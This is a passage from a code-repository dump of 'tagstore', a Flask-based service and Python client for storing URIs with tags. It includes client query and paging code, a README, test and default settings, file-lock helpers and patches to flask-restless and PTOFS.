headers=client.headers_json)\n\n def get_page(self, page=None, results_per_page=None):\n params = copy(self.params)\n if page is not None:\n if page > self.num_pages:\n raise IndexError()\n params['page'] = page\n if results_per_page is None:\n results_per_page = self.client.results_per_page\n params['results_per_page'] = results_per_page\n\n response = self.query(self.endpoint, self.client, params)\n ensure_response_status(response, 200)\n\n json = response.json()\n self.objects += [self.wrapper(self.client, obj) for obj in json['objects']]\n self.num_pages = json['total_pages']\n self.num_results = json['num_results']\n\n def __getitem__(self, value):\n try:\n return self.objects[value]\n except IndexError:\n self.page += 1\n self.get_page(self.page)\n return self[value]\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.iii >= len(self.objects):\n if self.page >= self.num_pages:\n raise StopIteration\n else:\n self.page += 1\n self.get_page(self.page)\n self.iii += 1\n # If you get an error here, you might be editing the results of the\n # query while using the results.\n return self.objects[self.iii - 1]\n\n def __len__(self):\n return self.num_results\n\n def __repr__(self):\n return '<QueryResponse({0}, {1})>'.format(self.endpoint, len(self))\n\n\nclass TagStoreClient(object):\n headers_json = {'Content-Type': 'application/json'}\n\n def __init__(self, endpoint, results_per_page=500,\n preload_page_num_results=1000):\n self.endpoint = endpoint\n\n self.preload_page_num_results = preload_page_num_results\n self.results_per_page = results_per_page\n\n def _api_endpoint(self, *segments):\n return '/'.join([self.endpoint] + map(unicode, segments))\n\n def _wrap_tag(self, tag):\n \"\"\"Wrap a Tag for restless.\"\"\"\n assert isinstance(tag, basestring)\n return dict(tag=tag)\n\n def _data(self, uri, fname, tags):\n \"\"\"JSON representation of a Datum.\"\"\"\n return dict(uri=uri, fname=fname, tags=map(self._wrap_tag, tags))\n\n def create(self, uri_or_fobj, fname=None, tags=[]):\n \"\"\"Create a Datum.\"\"\"\n if not isinstance(uri_or_fobj, basestring):\n # Store the file first.\n fobj = uri_or_fobj\n if fname is None:\n try:\n fname = fobj.name\n except AttributeError:\n fname = 'blob'\n files = {'blob': (fname, fobj)}\n resp = requests.post(self._api_endpoint('ofs'), files=files)\n ensure_response_status(resp, 200, 201)\n data = resp.json()\n uri = data['uri']\n else:\n uri = uri_or_fobj\n if fname is None:\n fname = os.path.basename(uri)\n if not fname:\n fname = 'blob'\n\n data = json.dumps(self._data(uri, fname, tags))\n response = requests.post(self._api_endpoint('data'),\n data=data, headers=self.headers_json)\n ensure_response_status(response, 201, 409)\n if response.status_code == 201:\n return DataResponse(self, response.json())\n else:\n return None\n\n def edit(self, instanceid, uri_or_fobj=None, fname=None, tags=None):\n \"\"\"Edit a Datum.\"\"\"\n data_endpoint = self._api_endpoint('data', unicode(instanceid))\n resp = requests.get(data_endpoint)\n if resp.status_code != 200:\n abort(404)\n dresp = DataResponse(self, resp.json())\n data = {}\n if uri_or_fobj is not None:\n uri = dresp.uri\n if not isinstance(uri_or_fobj, basestring):\n # Update the stored file\n fobj = uri_or_fobj\n resp = requests.put(uri, files={'blob': fobj})\n ensure_response_status(resp, 200)\n else:\n # Update the the URI\n if uri != uri_or_fobj:\n raise ValueError(u'Attempt to update blob while changing URI.')\n else:\n data['uri'] = uri\n if fname is not None:\n data['fname'] = fname\n # If file is stored locally, also change its fname\n if self._is_local(uri) and dresp.fname != fname:\n response = requests.put(uri, data=dict(fname=fname))\n if tags is not None:\n data['tags'] = map(self._wrap_tag, tags)\n data = json.dumps(data)\n response = requests.put(data_endpoint, data=data,\n headers=self.headers_json)\n assert response.status_code == 200\n return DataResponse(self, response.json())\n\n def swap_tags(self, tag_old, tag_new, *filters, **kwargs):\n \"\"\"Swap out old tag for new tag for all Data that match.\"\"\"\n told = self.query_tags(['tag', 'eq', tag_old], limit=1, single=True)\n tnew = self.query_tags(['tag', 'eq', tag_new], limit=1, single=True)\n data = dict(tags={})\n if tnew:\n add_term = [dict(id=tnew.id)]\n else:\n add_term = [self._wrap_tag(tag_new)]\n data['tags']['remove'] = [dict(id=told.id)]\n\n # Two cases, in order\n # If add does not happen first it will be deleted and replace will not\n # happen.\n # 1. new tag not present, add new and remove old tag\n # 2. new tag already present, just remove old tag\n case2_filters = [['tags__tag', 'any', tag_old]] + list(filters)\n case1_filters = [['tags__tag', 'not_any', tag_new]] + case2_filters\n\n data['q'] = self.list_to_q(*case1_filters, **kwargs)\n data['tags']['add'] = add_term\n response = requests.put(self._api_endpoint('data'), data=json.dumps(data),\n headers=self.headers_json)\n ensure_response_status(response, 200)\n\n data['q'] = self.list_to_q(*case2_filters, **kwargs)\n del data['tags']['add']\n response = requests.put(self._api_endpoint('data'), data=json.dumps(data),\n headers=self.headers_json)\n ensure_response_status(response, 200)\n\n def edit_tag(self, instanceid, tag):\n \"\"\"Edit a Tag.\"\"\"\n tag_endpoint = self._api_endpoint('tags', unicode(instanceid))\n data = json.dumps(self._wrap_tag(tag))\n response = requests.put(tag_endpoint, data=data,\n headers=self.headers_json)\n if response.status_code == 404:\n abort(404)\n ensure_response_status(response, 200)\n return TagResponse(self, response.json())\n\n @classmethod\n def _tagobjs_to_tags(cls, tagobjs):\n return [tagobj['tag'] for tagobj in tagobjs]\n\n @classmethod\n def get_tag_value(cls, tagobjs, key):\n for tag in cls._tagobjs_to_tags(tagobjs):\n if tag.startswith(u'{0}:'.format(key)):\n return tag[len(key) + 1:]\n return None\n\n def _is_local(self, uri):\n return uri.startswith(self._api_endpoint('ofs'))\n\n def delete(self, instanceid):\n \"\"\"Delete a Datum.\"\"\"\n # If file is stored locally, delete it\n data_endpoint = self._api_endpoint('data', unicode(instanceid))\n resp = requests.get(data_endpoint)\n if resp.status_code == 200:\n obj = DataResponse(self, resp.json())\n if self._is_local(obj.uri):\n response = requests.delete(obj.uri)\n response = requests.delete(data_endpoint)\n ensure_response_status(response, 204)\n return None\n\n def delete_tag(self, instanceid):\n \"\"\"Delete a Tag.\"\"\"\n tag_endpoint = self._api_endpoint('tags', unicode(instanceid))\n response = requests.delete(tag_endpoint)\n ensure_response_status(response, 204, 409)\n if response.status_code == 409:\n raise ValueError(u'Tag is still in use.')\n return None\n\n def _query(self, endpoint, wrapper, *filters, **kwargs):\n \"\"\"Query the tag store for object that satisfies the filters.\n\n filters - many 3-ples consisting of name, operation, and value.\n \n See https://flask-restless.readthedocs.org/en/latest/\n searchformat.html#query-format\n\n The search format is simplified from a dictionary to a 3-ple and\n automatically reconstructed.\n\n \"\"\"\n try:\n preload = kwargs['preload']\n except KeyError:\n preload = False\n else:\n del kwargs['preload']\n \n params = dict(q=json.dumps(self.list_to_q(*filters, **kwargs)))\n if kwargs.get('single', False):\n single = QueryResponse.query(endpoint, self, params)\n if single.status_code == 200:\n return wrapper(self, single.json())\n elif single.status_code == 400:\n raise ValueError(u'Multiple results, try limit?')\n return None\n return QueryResponse(self, endpoint, wrapper, params, preload)\n\n def query_data(self, *filters, **kwargs):\n \"\"\"Query the tagstore for Data that satisfy the filters.\n\n See _query() for details.\n\n \"\"\"\n return self._query('data', DataResponse, *filters, **kwargs)\n\n def query_tags(self, *filters, **kwargs):\n \"\"\"Query the tag store for Tags that satisfy the filters.\n\n See _query() for details.\n\n \"\"\"\n return self._query('tags', TagResponse, *filters, **kwargs)\n\n @classmethod\n def _filter(cls, name=None, op=None, val=None):\n \"\"\"Shorthand to create a filter object for REST API.\"\"\"\n return dict(name=name, op=op, val=val)\n\n @classmethod\n def _list_to_filter(cls, lll):\n \"\"\"Convert the client's 3-ple filter format to that of restless.\"\"\"\n name, op, val = lll\n if isinstance(val, tuple) or isinstance(val, list):\n val = cls._list_to_filter(val)\n return cls._filter(name, op, val)\n\n @classmethod\n def _wrap_filters(cls, filters, **kwargs):\n \"\"\"Wrap the filters for restless.\"\"\"\n assert isinstance(filters, tuple) or isinstance(filters, list)\n return dict(filters=filters, **kwargs)\n\n @classmethod\n def list_to_q(cls, *filters, **kwargs):\n return cls._wrap_filters(map(cls._list_to_filter, filters), **kwargs)\n\n\nclass Query(object):\n \"\"\"Collection of methods to generate common queries.\"\"\"\n @classmethod\n def tags_any(cls, op, value):\n return ['tags', 'any', ['tag', op, value]]\n" }, { "alpha_fraction": 0.7268421053886414, "alphanum_fraction": 0.7315789461135864, "avg_line_length": 39.30434799194336, "blob_id": "faf0b70400e8cb00a9fe55a55a4901aab94be8c2", "content_id": "15ea93eb0ab88df7e9bc624ba87685f9da3f2353", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 730, "num_lines": 46, "path": "/README.txt", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "========\r\nTagstore\r\n========\r\n\r\nSummary\r\n-------------\r\n\r\nTagstore provides storage and querying of URI and tag relationships. For\r\nexample, a URI \"http://example.com\" could be stored with multiple tags\r\n\"website:example\" and \"type:example\". Tags are allowed to be any Unicode.\r\n\r\nMotivation\r\n--------------\r\n\r\nOrganization and presentation of data is fundamental to making it useful. Storage is critical, but secondary. Fortunately, URIs refer to data on a network, precluding the need to store data locally. We often organize data in hierarchies, for example, filesystems might organize data by ocean, then year, then cruise, as directories. Tags provide a flexible organization method that allow for different views to be created based on tag values. Perhaps organizing data by the instrument used to collect it or by the time it was collected is more important than ocean first. One can continue to provide a filesystem-like view by using tags with paths as their values. Additional tags can allow for different views of the stored data.\r\n\r\nObject storage\r\n--------------------\r\n\r\nAs a convenience, tagstore also provides storage of files through OFS's PTOFS.\r\nThis allows for indirectly tagging of files by storing first and tagging the\r\nresulting URI.\r\n\r\nTag conventions\r\n----------------------\r\n\r\nAs tags can be arbitrary, it is prudent to establish some external order before\r\nusing tagstore. The CCHDO's tagging conventions are laid out here:\r\nhttps://docs.google.com/document/d/13u8qybFouIcR92vXm_OEgsP2DrMvf_nkJKYGmlE78V8/edit\r\n\r\nAPI\r\n-----\r\n\r\n``GET /data``\r\n\r\n``GET /tags``\r\n\r\n``GET /ofs``\r\n\r\n``POST /ofs``\r\n\r\nDetails\r\n---------\r\n\r\nTags are stored in a database where URIs have a many-to-many relationship with tags.\r\nObject storage is provided by a client that is aware of certain URIs being stored by tagstore. It writes the file to the OFS, then stores the available URI in tagstore.\r\n" }, { "alpha_fraction": 0.6995515823364258, "alphanum_fraction": 0.7623318433761597, "avg_line_length": 30.85714340209961, "blob_id": "15bf26f8bae3738a246b6051bd0632d944930456", "content_id": "a22f48e442b3ad75de026a0b0d60808c791e54ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 72, "num_lines": 7, "path": "/tagstore/settings/test.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "# Having DEBUG true causes this\n# https://github.com/jarus/flask-testing/issues/33#issuecomment-31589822\nDEBUG = False\nTESTING = True\nSQLALCHEMY_DATABASE_URI = 'sqlite://'\nLIVESERVER_PORT = 8943\nPTOFS_DIR = 'tagstore-test'\n" }, { "alpha_fraction": 0.5201254487037659, "alphanum_fraction": 0.5300574898719788, "avg_line_length": 28.890625, "blob_id": "e8bf90e624cbf93894df193505a9913f4a4f3fc1", "content_id": "9813d5b0fc6bc2eaa86670af81866c750c634b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1913, "license_type": "no_license", "max_line_length": 76, "num_lines": 64, "path": "/tagstore/patch/lockfile.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom logging import getLogger, CRITICAL\nfrom time import sleep\nfrom uuid import getnode\n\nfrom tagstore.vendor.lockfile import (\n LockFile, LockError, NotLockedError, TimeOutError, AlreadyLockedError\n)\n\n\nlog = getLogger(__name__)\n\n\ndef lockpath(basepath, name):\n return os.path.abspath(os.path.join(basepath, '.lock-{0}'.format(name)))\n\n\nclass RLockFile(object):\n def __init__(self, name):\n self.name = name\n self.lock = LockFile(self.name)\n self.pidfile = self.name + '.pid'\n self.locks = 0\n\n def acquire(self):\n \"\"\"Spin until locked.\n\n Acquire is reentrant.\n\n \"\"\"\n pid = '{0}_{1}'.format(getnode(), os.getpid())\n while True:\n log.debug('acquiring {0} {1}'.format(self.name, pid))\n try:\n self.lock.lock(timeout=1e-6)\n except (TimeOutError, AlreadyLockedError) as error:\n try:\n lockpid = open(self.pidfile, 'r').read()\n except (IOError, OSError, ValueError):\n lockpid = None\n # If locked and pid is the same, this is reentrant.\n log.debug('{0} {1}'.format(lockpid, pid))\n if lockpid == pid:\n log.debug(u'reentrant acquisition')\n self.locks += 1\n break\n else:\n with open(self.pidfile, 'w') as fff:\n fff.write(pid)\n break\n sleep(0.5)\n log.debug('acquired {0} {1}'.format(self.name, pid))\n\n def release(self):\n #if self.locks != 0:\n # self.locks -= 1\n # log.debug('released reentrance {0}'.format(self.name))\n # return\n try:\n self.lock.unlock()\n except (AttributeError, NotLockedError):\n pass\n log.debug('released {0}'.format(self.name))\n" }, { "alpha_fraction": 0.6814814805984497, "alphanum_fraction": 0.6814814805984497, "avg_line_length": 37.57143020629883, "blob_id": "aa4c6c351284cf246e7d1f02f3869d2619a2be67", "content_id": "521a173f176e76c789de5618c4f12759953a6d81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/tagstore/patch/restless.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "\"\"\"Add operators to restless\"\"\"\nfrom flask.ext.restless import search\n\n\nsearch.OPERATORS['not_any'] = lambda f, a, fn: ~f.any(search._sub_operator(f, a, fn))\nsearch.OPERATORS['not_ilike'] = lambda f, a: ~f.ilike(a)\nsearch.OPERATORS['not_like'] = lambda f, a: ~f.like(a)\n" }, { "alpha_fraction": 0.652046799659729, "alphanum_fraction": 0.6562238931655884, "avg_line_length": 33.20000076293945, "blob_id": "903fe8dbf8caae603041bfc6f771359347fd7d72", "content_id": "1c6dcd1f3665094374f07d226fb788e070e368da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, "license_type": "no_license", "max_line_length": 82, "num_lines": 70, "path": "/tagstore/patch/ptofs.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "\"\"\"Patch ofs.local.storedjson.PersistentState to be more threadsafe\n\n* Prevent concurrent access to persistence file\n* Prevent concurrent access to PersistentState by PTOFS (This will also prevent\nconcurrent read and write to PTOFS)\n\n\"\"\"\n\nimport os\nimport os.path\nfrom ofs.local import PTOFS\nfrom ofs.local.storedjson import PersistentState, PERSISTENCE_FILENAME\nfrom logging import getLogger, DEBUG, WARN\n\nfrom lockfile import RLockFile, lockpath\n\n\nlog = getLogger(__name__)\nlog.setLevel(WARN)\n\n\ndef patch_ptofs(storage_dir):\n persistence_lock = RLockFile(lockpath(storage_dir, 'persistence'))\n ptofs_lock = RLockFile(lockpath(storage_dir, 'ptofs'))\n\n old_revert = PersistentState.revert \n def new_revert(self):\n log.debug('lock persist acquiring {0}'.format(os.getpid()))\n persistence_lock.acquire()\n log.debug('lock persist acquired {0}'.format(os.getpid()))\n try:\n old_revert(self)\n finally:\n persistence_lock.release()\n log.debug('lock persist released {0}'.format(os.getpid()))\n PersistentState.revert = new_revert\n\n old_sync = PersistentState.sync\n def new_sync(self):\n log.debug('lock persist acquiring {0}'.format(os.getpid()))\n persistence_lock.acquire()\n log.debug('lock persist acquired {0}'.format(os.getpid()))\n try:\n old_sync(self)\n finally:\n persistence_lock.release()\n log.debug('lock persist released {0}'.format(os.getpid()))\n PersistentState.sync = new_sync\n\n old_init = PersistentState.__init__\n def new_init(self, filepath=None, filename=PERSISTENCE_FILENAME, create=True):\n log.debug('lock PTOFS acquiring {0}'.format(os.getpid()))\n ptofs_lock.acquire()\n log.debug('lock PTOFS acquired {0}'.format(os.getpid()))\n old_init(self, filepath, filename, create)\n PersistentState.__init__ = new_init\n\n try:\n old_del = PersistentState.__del__\n except AttributeError:\n old_del = lambda x: None\n def new_del(self):\n old_del(self)\n # Release PTOFS lock whenever persisted state is collected.\n try:\n ptofs_lock.release()\n log.debug('lock PTOFS released {0}'.format(os.getpid()))\n except RuntimeError:\n log.error('lock PTOFS failed to release {0}'.format(os.getpid()))\n PersistentState.__del__ = new_del\n" }, { "alpha_fraction": 0.6703296899795532, "alphanum_fraction": 0.7362637519836426, "avg_line_length": 29.33333396911621, "blob_id": "d546d127522a45d4d48cd44a1631b232e6618999", "content_id": "023f58da2d292405c09976747a42344780a1f114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/tagstore/settings/default.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "PTOFS_DIR = 'tagstore-data'\nMAX_RESULTS_PER_PAGE_DATA = 200\nMAX_RESULTS_PER_PAGE_TAG = 500\n" } ]
12
tejaswinikurane/Data-Science-Assignments
https://github.com/tejaswinikurane/Data-Science-Assignments
ffe286839d4b341742af7b68292a6e0ab131626a
9fd61c65d26cb36989db86b4d84c4caa10b2a8b3
324a9813da6a218f60d39af4af2c3f550d28da5d
refs/heads/main
2023-05-12T21:52:17.889014
2021-06-02T15:55:09
2021-06-02T15:55:09
342,162,675
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.668433427810669, "alphanum_fraction": 0.6884570121765137, "avg_line_length": 33.010311126708984, "blob_id": "8915645881726c73026e27c786e9c733a014c5c8", "content_id": "e9dbfd4b7a2a0b680cdfea3c73fc41fc67d25729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3396, "license_type": "no_license", "max_line_length": 100, "num_lines": 97, "path": "/NN/ANN.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 5 08:44:06 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndf = pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\NN\\\\forestfires.csv\")\r\n\r\n#As dummy variables are already created, we will remove the month and and columns\r\ndf.drop([\"month\",\"day\"],axis=1,inplace = True)\r\n\r\ndf[\"size_category\"].value_counts()\r\ndf.isnull().sum()\r\ndf.describe()\r\n\r\n##small = 0, large = 1\r\ndf.loc[df[\"size_category\"]=='small','size_category']=0\r\ndf.loc[df[\"size_category\"]=='large','size_category']=1\r\ndf[\"size_category\"].value_counts()\r\n\r\n#Defining Normalization function\r\ndef norm_func(i):\r\n x = (i-i.min())/(i.max()-i.min())\r\n return (x)\r\n\r\n#separating predictors and target variables\r\npredictors = df.iloc[:,0:28]\r\ntarget = df.iloc[:,28]\r\n\r\n#normalizing the predictors\r\npredictors1 = norm_func(predictors)\r\n#data = pd.concat([predictors1,target],axis=1)\r\n\r\n#splitting the data into train and test datasetss\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test= train_test_split(predictors1,target, test_size=0.3,stratify = target)\r\n\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation,Layer,Lambda\r\ndef prep_model(hidden_dim):\r\n model = Sequential()\r\n for i in range(1,len(hidden_dim)-1):\r\n if (i==1):\r\n model.add(Dense(hidden_dim[i],input_dim=hidden_dim[0],activation=\"relu\"))\r\n else:\r\n model.add(Dense(hidden_dim[i],activation=\"relu\"))\r\n model.add(Dense(hidden_dim[-1],kernel_initializer=\"normal\",activation=\"sigmoid\"))\r\n model.compile(loss=\"binary_crossentropy\",optimizer = \"rmsprop\",metrics = [\"accuracy\"])\r\n return model \r\n\r\n#y_train = pd.DataFrame(y_train)\r\n\r\n#building the model\r\nfirst_model = prep_model([28,50,40,20,1])\r\nfirst_model.fit(np.array(x_train),np.array(y_train),epochs=500)\r\npred_train = first_model.predict(np.array(x_train))\r\n\r\n#Converting the predicted values to series \r\npred_train = pd.Series([i[0] for i in pred_train])\r\n\r\n#predictions of class for train data\r\nsize = [\"small\",\"large\"]\r\npred_train_class = pd.Series([\"small\"]*361)\r\npred_train_class[[i>0.5 for i in pred_train]]= \"large\"\r\n\r\ntrain = pd.concat([x_train,y_train],axis=1)\r\ntrain[\"size_category\"].value_counts()\r\n\r\n#metrics of success For training data\r\nfrom sklearn.metrics import confusion_matrix\r\ntrain[\"original_class\"] = \"small\"\r\ntrain.loc[train[\"size_category\"]==1,\"original_class\"] = \"large\"\r\ntrain.original_class.value_counts()\r\nconfusion_matrix(pred_train_class,train[\"original_class\"])\r\nnp.mean(pred_train_class==pd.Series(train[\"original_class\"]).reset_index(drop=True)) #100%\r\npd.crosstab(pred_train_class,pd.Series(train[\"original_class\"]).reset_index(drop=True))\r\n\r\n#metrics of success For test data\r\npred_test = first_model.predict(np.array(x_test))\r\npred_test = pd.Series([i[0] for i in pred_test])\r\npred_test_class = pd.Series([\"small\"]*156)\r\npred_test_class[[i>0.5 for i in pred_test]] = \"large\"\r\ntest =pd.concat([x_test,y_test],axis=1)\r\ntest[\"original_class\"]=\"small\"\r\ntest.loc[test[\"size_category\"]==1,\"original_class\"] = \"large\"\r\n\r\ntest[\"original_class\"].value_counts()\r\nnp.mean(pred_test_class==pd.Series(test[\"original_class\"]).reset_index(drop=True)) # 89.10%\r\nconfusion_matrix(pred_test_class,test[\"original_class\"])\r\npd.crosstab(pred_test_class,pd.Series(test[\"original_class\"]).reset_index(drop=True))\r\n" }, { "alpha_fraction": 0.6728032231330872, "alphanum_fraction": 0.6925185918807983, "avg_line_length": 32.18303680419922, "blob_id": "50d10ad4c2c546830913b773682d92307805adb3", "content_id": "c2bae8d85e1f524d4acf8f90fdec37e7f247b513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7659, "license_type": "no_license", "max_line_length": 117, "num_lines": 224, "path": "/Forecasting/airlines.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 20 21:43:48 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\Airlines_Data.xlsx')\r\ndata.head()\r\ndata.columns\r\n\r\nmonth_index = data.set_index(['Month'])\r\n\r\nplt.plot(month_index);plt.xlabel('Month');plt.ylabel('No. of Passengers')\r\n#data having upward trend with multiplicative seasonality, non stationary\r\nmonth_index.head()\r\nmonth_index.tail()\r\n\r\n#rolling statistics\r\nrolling_mean = month_index.rolling(window = 12).mean() #window = 12 for 12 months, for days=365\r\nrolling_std = month_index.rolling(window = 12).std()\r\nprint(rolling_mean)\r\nprint(rolling_std)\r\n\r\noriginal = plt.plot(month_index, color = 'blue', label = 'original')\r\nmean = plt.plot(rolling_mean, color = 'black',label = 'rolling mean')\r\nstd = plt.plot(rolling_std, color = 'red', label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.title('rolling mean and rolling std')\r\nplt.show()\r\n\r\n#perform dickey-fuller test to check stationarity of data\r\nfrom statsmodels.tsa.stattools import adfuller\r\ndftest = adfuller(month_index['Passengers'],autolag = 'AIC')\r\ndfoutput = pd.Series(dftest[0:4], index = ['Test statistic','P-value','Lags-used','Number of observations used'])\r\nfor key,value in dftest[4].items():\r\n dfoutput['critical value (%s)'%key] = value\r\n \r\nprint(dfoutput)\r\n#since p-value >0.05, accept null hypothesis that unit root is present in AR model and data is not stationary. \r\n\r\n#estimating trend\r\nmonth_index_log = np.log(month_index) \r\nplt.plot(month_index_log)\r\n#upward trend remains same, but value of y has been changed\r\n\r\n#rolling statistics for transformed data\r\nmoving_average = month_index_log.rolling(window = 12).mean()\r\nmoving_std = month_index_log.rolling(window = 12).std()\r\nprint(moving_average)\r\nprint(moving_std)\r\n\r\norig = plt.plot(month_index_log,color = 'blue',label = 'log transformed')\r\nmean_log = plt.plot(moving_average,color = 'black',label = 'rolling mean_log')\r\nplt.legend(loc = 'best')\r\nplt.title('moving average')\r\nplt.show()\r\n#upward trend still persists\r\n\r\n#getting difference between log values and moving average\r\nlogMinusMA = month_index_log - moving_average\r\nlogMinusMA\r\nlogMinusMA.dropna(inplace = True)\r\nlogMinusMA.head()\r\n\r\n#stationarity check function\r\nfrom statsmodels.tsa.stattools import adfuller\r\ndef test_stat(ts):\r\n \r\n #determining rolling statistics\r\n mov_avg = ts.rolling(window = 12).mean()\r\n mov_std = ts.rolling(window = 12).std()\r\n \r\n #plotting rolling statistics \r\n org = plt.plot(ts,color = 'blue',label = 'original')\r\n MA = plt.plot(mov_avg, color = 'red',label = 'Moving average')\r\n std = plt.plot(mov_std, color = 'black',label ='Moving std')\r\n plt.legend(loc = 'best')\r\n plt.title('rolling statistics')\r\n plt.show()\r\n \r\n #performing Dickey-fuller test for sationarity check\r\n df_test = adfuller(ts['Passengers'],autolag = 'AIC')\r\n df_output = pd.Series(df_test[0:4],index = ['Test statistic', 'p-value','#Lags used','No. of Observations used'])\r\n for key, value in df_test[4].items(): #.items is very important\r\n df_output['critical value (%s)'%key] = value\r\n print(df_output)\r\n \r\n\r\ntest_stat(logMinusMA)\r\n#p-value<0.05, and test statistic is approx.= critical value.therefore, time series is now stationary\r\n\r\nplt.plot(logMinusMA)\r\n\r\n#differentiating\r\nlogMinusMAshifted = month_index_log - month_index_log.shift()\r\nplt.plot(logMinusMAshifted)\r\n\r\nlogMinusMAshifted.dropna(inplace = True)\r\ntest_stat(logMinusMAshifted)\r\n#since p-value is nearly = 0.05, data is almost stationary. \r\n\r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nresult = seasonal_decompose(month_index_log, model = 'additive', period = 12)\r\ntrend = result.trend \r\nseasonal = result.seasonal\r\nresidual = result.resid\r\n\r\nplt.subplot(411)\r\nplt.plot(month_index_log, label = 'original')\r\nplt.legend(loc = 'best')\r\nplt.subplot(412)\r\nplt.plot(trend, label = 'trend')\r\nplt.legend(loc = 'best')\r\nplt.subplot(413)\r\nplt.plot(seasonal, label = 'seasonality')\r\nplt.legend(loc = 'best')\r\nplt.subplot(414)\r\nplt.plot(residual, label = 'residuals')\r\nplt.legend(loc = 'best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#checking residuals for stationarity\r\ndec_log = residual\r\ndec_log.dropna(inplace = True)\r\n\r\n \r\nmov_avg1 = dec_log.rolling(window = 12).mean()\r\nmov_std1 = dec_log.rolling(window = 12).std()\r\n \r\n#plotting rolling statistics \r\nxorg1 = plt.plot(dec_log,color = 'blue',label = 'original')\r\nMA1 = plt.plot(mov_avg1, color = 'red',label = 'Moving average')\r\nstd1 = plt.plot(mov_std1, color = 'black',label ='Moving std')\r\nplt.legend(loc = 'best')\r\nplt.title('noise component')\r\nplt.show()\r\n \r\ndec_log = dec_log.to_frame()\r\n#performing Dickey-fuller test for sationarity check\r\ndf_test1 = adfuller(dec_log['resid'],autolag = 'AIC')\r\ndf_output1 = pd.Series(df_test1[0:4],index = ['Test statistic', 'p-value','#Lags used','No. of Observations used'])\r\nfor key, value in df_test1[4].items(): #.items is very important\r\n df_output1['critical value (%s)'%key] = value\r\nprint(df_output1)\r\n# Noise component not stationary\r\n\r\n#d = 1\r\n#plotting acf plot for q and for value of p plotting pacf plot\r\nfrom statsmodels.tsa.stattools import acf, pacf\r\n\r\nlag_acf = acf(logMinusMAshifted,nlags = 20,fft = False)\r\nlag_pacf = pacf(logMinusMAshifted,nlags = 20, method = 'ols')\r\n\r\n#plot acf\r\nplt.plot(lag_acf)\r\nplt.axhline(y = 0,linestyle='--')\r\nplt.axhline(y = -1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.title('Autocorrelation plot')\r\n#graph first approaches to zero at approx. 2 so, q=2\r\n\r\n#plot pacf plot\r\nplt.plot(lag_pacf)\r\nplt.axhline(y = 0,linestyle='--')\r\nplt.axhline(y = -1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.title('Partial Autocorrelation plot')\r\n#graph first approaches to zero at approx. 2 so, p=2\r\n\r\n#AR model(taking q = 0)\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel_ar = ARIMA(month_index_log, order = (2,1,0))\r\nresult_ar = model_ar.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result_ar.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result_ar.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.9508\r\n \r\n#MA model (taking p = 0)\r\nmodel_ma = ARIMA(month_index_log, order = (0,1,2))\r\nresult_ma = model_ma.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result_ma.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result_ma.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.8278\r\n \r\n#combined ARIMA model for forecasting\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel = ARIMA(month_index_log, order = (2,1,2))\r\nresult = model.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.6931\r\n \r\n\r\n#predictions\r\npredictions = pd.Series(result.fittedvalues,copy = True)\r\nprint(predictions.head())\r\n\r\npredictions_cumsum = 